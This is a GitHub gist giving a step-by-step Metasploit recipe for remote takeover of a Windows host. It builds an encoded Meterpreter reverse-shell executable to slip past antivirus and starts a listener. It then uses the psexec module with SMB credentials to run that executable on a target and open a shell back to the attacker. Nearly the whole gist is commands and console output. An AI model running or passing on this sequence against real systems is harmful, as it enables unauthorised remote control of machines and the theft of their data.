Created
September 5, 2017 18:52
-
-
Save YourFriendCaspian/02b5724cdefdb2c6f2d50af48ba1b6a1 to your computer and use it in GitHub Desktop.
Metasploit: Custom Psexec Executable
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## Metasploit: Custom Psexec Executable ## | |
| #The first thing we need to do is generate a custom executable to use with Meterpreter. | |
| $ msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=4445 R | msfencode -t exe -e x86/shikata_ga_nai -c 5 > custom.exe | |
| #Next we need to setup a multi handler to listen for connections. | |
| $ msf > use exploit/multi/handler | |
| $ msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp | |
| $ PAYLOAD => windows/meterpreter/reverse_tcp | |
| $ msf exploit(handler) > set LHOST 192.168.0.1 | |
| $ LHOST => 192.168.0.1 | |
| $ msf exploit(handler) > set LPORT 4445 | |
| $ LPORT => 4445 | |
| [*] Started reverse handler on 192.168.0.1:4445 | |
| [*] Starting the payload handler... | |
| #In another msfconsole session we need to configure the psexec exploit module to use our custom executable. | |
| $ msf > use exploit/windows/smb/psexec | |
| $ msf exploit(psexec) > set RHOST 192.168.0.2 | |
| $ RHOST => 192.168.0.2 | |
| $ msf exploit(psexec) > set SMBUser user | |
| $ SMBUser => user | |
| $ msf exploit(psexec) > set SMBPass pass | |
| $ SMBPass => pass | |
| $ msf exploit(psexec) > set EXE::Custom /path/to/custom.exe | |
| $ EXE::Custom => /path/to/custom.exe | |
| #Finally, we need to run the exploit. If everything worked then you should see a new meterpreter session open in multi/handler | |
| $ msf exploit(psexec) > exploit |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment